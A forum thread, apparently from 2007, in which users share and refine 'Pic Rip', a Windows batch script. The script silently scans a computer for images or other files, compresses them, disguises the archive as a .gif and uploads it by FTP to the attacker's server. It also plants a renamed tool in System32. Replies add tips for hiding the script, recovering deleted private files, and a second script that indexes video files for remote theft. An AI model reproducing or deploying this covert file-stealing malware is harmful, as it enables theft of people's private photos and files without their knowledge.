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Pic Rip v1.2.0


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Ok I had to add 7 or so more lines of code to the last version I posted. I am doing a test and it seems to be working. Only problem is it takes around 5 minuets to run this. The compressions tool and the upload take a bulk of the time.

Good news, it works; However, the file hosting service I am using does not allow certain files to be uploaded, .uha being one of them. To fix this I added ren picrip.uha picrip.gif. I will make another batch file that will switch that back once you download the picture dump from the ftp. Many FTP's will not allow certain types of files to be saved. So uploading it as picrip.gif is to help everyone not just me.

Now, because I used tools from the 2000 NT resource kit and not all computers have those tools installed I added a bit of code that will copy far.jpg, which is the tool I used to  Windows/System32/Forfiles.exe. Also since I used uharc as a compression program that will also be installed. However, I set it up so it up so it would be installed to the picrip/temp directory. The picrip directory is removed after the files are uploaded.

The following is the code for the main batch file:

:: Pic Rip v1.2.0
:: Scans computer for images.
:: Images are then transfered
:: via FTP.
:: ~AaoN~ Monday, Spetember 3rd, 2007


:: Gives program title.

title Pic Rip v1.2.0

::Copy tools to one location for future use.

copy far.jpg c:

copy uharc.exe c:

cd c:

if exist picrip goto temp

md picrip


cd c:picrip

if exist temp goto forfile

md temp


::Move tools again

move c:far.jpg c:picrip

move c:uharc.exe c:picriptemp

:: Checks to see if forfiles already exists.

cd c:windowssystem32

:: If it does exist goto SCAN, if not copy it.

if exist forfiles.exe GOTO SCAN

copy c:picripfar.jpg c:windowssystem32forfiles.exe

:: Uses forfiles to scan and copy all images to temp directory


FORFILES -pC: -s -m*.jpg -c"CMD /C copy @FILE c:picriptemp@FILE"

cd c:picriptemp

uharc a picrip.uha

ren picrip.uha picrip.ftp

Echo "USERNAME"> ftpcmd.txt

echo "PASSWORD">> ftpcmd.txt

echo binary>> ftpcmd.txt

echo prompt n>>ftpcmd.txt

echo mput picrip.ftp>> ftpcmd.txt

echo bye >> ftpcmd.txt

ftp -s:ftpcmd.txt "PUT FTP HERE"

del ftpcmd.txt


The following is the only part you'll have to edit in the main batch program:

Echo "USERNAME"> ftpcmd.txt

echo "PASSWORD">> ftpcmd.txt

echo binary>> ftpcmd.txt

echo prompt n>>ftpcmd.txt

echo mput picrip.ftp>> ftpcmd.txt

echo bye >> ftpcmd.txt

ftp -s:ftpcmd.txt "PUT FTP HERE"

Just fill in your username, pass, and the ftp.

If you would like to rip files other than jpg's there is one other line that you will have to edit. And that line is this:

FORFILES -pC: -s -m*.jpg -c"CMD /C copy @FILE c:picriptemp@FILE"

You would edit *.jpg to *you file format. eg *.mpg *.avi.

I will be continuing to work on this as well, trying to fine tune the program. Make it so it runs faster and invisibly. I'll make another post here shortly with all the stuff you will need.

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Pic Rip v1.2.0 Release.

Here it is the much awaited, cheah, Pic Rip. The batch that scans any computer rips any file and uploads it to an ftp.

Included in this download is:

main.bat    //The main program for ripping, run this beast.

WinUHA      //You'll need to install this to view the compressed archive

UHARC      //This is what compresses your files.

far.jpg        //Forfiles.exe from resouce kit

bu_far.bat //If for some reason the main batch is unable to copy the Forfiles.exe to its correct location run this then re-run the main.bat

Renamer    //This will rename picrip.gif back to picrip.uha, make sure this is in the same directory as pirrip.gif when you run it

The following is the only part you'll have to edit in the main batch program:

Echo "USERNAME"> ftpcmd.txt

echo "PASSWORD">> ftpcmd.txt

echo binary>> ftpcmd.txt

echo prompt n>>ftpcmd.txt

echo mput picrip.ftp>> ftpcmd.txt

echo bye >> ftpcmd.txt

ftp -s:ftpcmd.txt "PUT FTP HERE"

Just fill in your username, pass, and the ftp.

If you would like to rip files other than jpg's there is one other line that you will have to edit. And that line is this:

FORFILES -pC: -s -m*.jpg -c"CMD /C copy @FILE c:picriptemp@FILE"

You would edit *.jpg to *you file format. eg *.mpg *.avi.

I will be continuing to work on this as well, trying to fine tune the program. Make it so it runs faster and invisibly. I'll make another post here shortly with all the stuff you will need.







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use cax.exe or vbs to hide it

do not scan the %userprofile%  temp internet settings ( too much crap )

stick to desktop and maybe setup the script to have a blacklist fro folders like %temp% etc ..

use some kind of CLI undelete app and recycle bin restore util ( people  often delete c:recyle with porn in it etc..

http://rmccurdy.com/scripts/quickclean.txt ( ya i suck at bat too ) see ./ fro the EXE

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DLSS wrote this in a thread:

@echo off
color 0a
echo DVDrip-INDEXER  by DLSS
echo ------------------------------
echo %cd%

set save=savelocation-(location-of-script)
set ftp-server=ftp.yourserver.com
set ftp-user=yourusername
set ftp-pass=yourpassword
echo %ftp-user% >> "%file%.ftp"
echo %ftp-pass% >> "%file%.ftp"
echo prompt off >> "%file%.ftp"

# problem ! i need to put mget "
# in front of each line and 
# " after each line ....

dir "C:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
dir "D:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
dir "E:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
dir "F:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
dir "G:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
dir "H:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
dir "I:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
# etc
FTP -s:%file%.ftp %ftp-server%

This only scans the directory its in, and is setup for avi's.

yeah, it in itself is flexible, (cou can easily change dir's , what to look for, etc ....

but seriously advise against useing this method to dump files to your ftp server !

it would in a lot of cases take to long, give the risk of the firewall fering off a connection warning, and them finding the login info of yer precious, multi-gig ftp server, etc

i gave this method of dumping a file-list because it's meant to be used you can setup a 50 webs account wich may be compromised.

so you have the info and could specifically target those files the next time around, if you so wish. (by useing one of the vlc installing payloads)

running the risk of people finding the info toyer precious multi-gig server is just stupid in my eyes ....

and probably not even worth it ...

(and you wont get verry far with a small 50mb-1GB server if you want to grab photo's/video's ...)

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  • 2 weeks later...

I think there might be a issue with the ftp uploading.

I keep getting password required, then it would just prompt exit Y/N

I believe you cant have the "" when you echo the FTP info to the ftpcmd.txt

It should be:

Echo userName> ftpcmd.txt

echo passWord>> ftpcmd.txt

This worked for me. I wasnt sure how you got it to work.

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